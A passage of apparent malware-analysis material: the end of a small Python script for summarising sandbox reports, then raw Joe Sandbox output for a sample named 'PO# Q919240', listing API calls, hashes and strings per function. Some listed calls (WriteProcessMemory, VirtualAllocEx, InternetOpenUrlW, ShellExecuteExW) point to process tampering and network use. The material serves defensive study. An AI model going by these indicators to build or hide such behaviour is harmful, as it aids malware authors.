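• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
"""

if __name__ == "__main__":
    for line in summarize(SAMPLE):
        print(line)
```

Run it on the text of a whole report to get one line per flagged function; the first direct ref address is what you jump to in the dump. Indirect calls are kept with their callee address so a rule can still match on APIs the function reaches only through a helper, as inet_addr is reached here.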
                APIs
                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                • MessageBeep.USER32(00000000), ref: 00460C46
                • KillTimer.USER32(?,0000040A), ref: 00460C68
                • EndDialog.USER32(?,00000001), ref: 00460C83
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: BeepDialogItemKillMessageTextTimerWindow
                • String ID:
                • API String ID: 3741023627-0
                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$Icon
                • String ID:
                • API String ID: 4023252218-0
                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                APIs
                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyObject$IconMessageSendWindow
                • String ID:
                • API String ID: 1489400265-0
                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                APIs
                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                • DestroyWindow.USER32(?), ref: 00455728
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                • String ID:
                • API String ID: 1042038666-0
                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                APIs
                • __getptd.LIBCMT ref: 0041780F
                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                • __getptd.LIBCMT ref: 00417826
                • __amsg_exit.LIBCMT ref: 00417834
                • __lock.LIBCMT ref: 00417844
                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                APIs
                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                • ExitThread.KERNEL32 ref: 00413D4E
                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                • __freefls@4.LIBCMT ref: 00413D74
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                • String ID:
                • API String ID: 2403457894-0
                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                APIs
                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                • ExitThread.KERNEL32 ref: 004151ED
                • __freefls@4.LIBCMT ref: 00415209
                Similarity
                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                • String ID:
                • API String ID: 4247068974-0
                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                Strings
                Similarity
                • API ID:
                • String ID: )$U$\
                • API String ID: 0-3705770531
                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                APIs
                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                • CoInitialize.OLE32(00000000), ref: 0046E505
                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                • CoUninitialize.OLE32 ref: 0046E53D
                Strings
                Similarity
                • API ID: CreateInitializeInstanceUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 886957087-24824748
                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: \
                • API String ID: 4104443479-2967466578
                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                Strings
                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                Similarity
                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                • API String ID: 708495834-557222456
                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                APIs
                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                Strings
                Similarity
                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                • String ID: @
                • API String ID: 4150878124-2766056989
                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: \$]$h
                • API String ID: 4104443479-3262404753
                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                APIs
                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • CloseHandle.KERNEL32(?), ref: 00457E09
                Strings
                Similarity
                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                • String ID: <$@
                • API String ID: 2417854910-1426351568
                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                APIs
                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Strings
                Similarity
                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                • String ID:
                • API String ID: 3705125965-3916222277
                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                APIs
                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                Strings
                Similarity
                • API ID: Menu$Delete$InfoItem
                • String ID: 0
                • API String ID: 135850232-4108050209
                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                APIs
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                Strings
                Similarity
                • API ID: Window$Long
                • String ID: SysTreeView32
                • API String ID: 847901565-1698111956
                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                APIs
                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                Strings
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: AU3_GetPluginDetails
                • API String ID: 145871493-4132174516
                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                APIs
                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                Strings
                Similarity
                • API ID: MessageSend$Window
                • String ID: SysMonthCal32
                • API String ID: 2326795674-1439706946
                • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                APIs
                • DestroyWindow.USER32(00000000), ref: 00450A2F
                Strings
                Similarity
                • API ID: DestroyWindow
                • String ID: msctls_updown32
                • API String ID: 3375834691-2298589950
                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                APIs
                Strings
                Similarity
                • API ID: _memmove
                • String ID: $<
                • API String ID: 4104443479-428540627
                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                Strings
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                Strings
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                Strings
                Similarity
                • API ID: ErrorMode$DiskFreeSpace
                • String ID: \VH
                • API String ID: 1682464887-234962358
                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                Strings
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: \VH
                • API String ID: 2507767853-234962358
                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                Strings
                Similarity
                • API ID: ErrorMode$InformationVolume
                • String ID: \VH
                • API String ID: 2507767853-234962358
                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                Strings
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                • API String ID: 3850602802-1010561917
                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
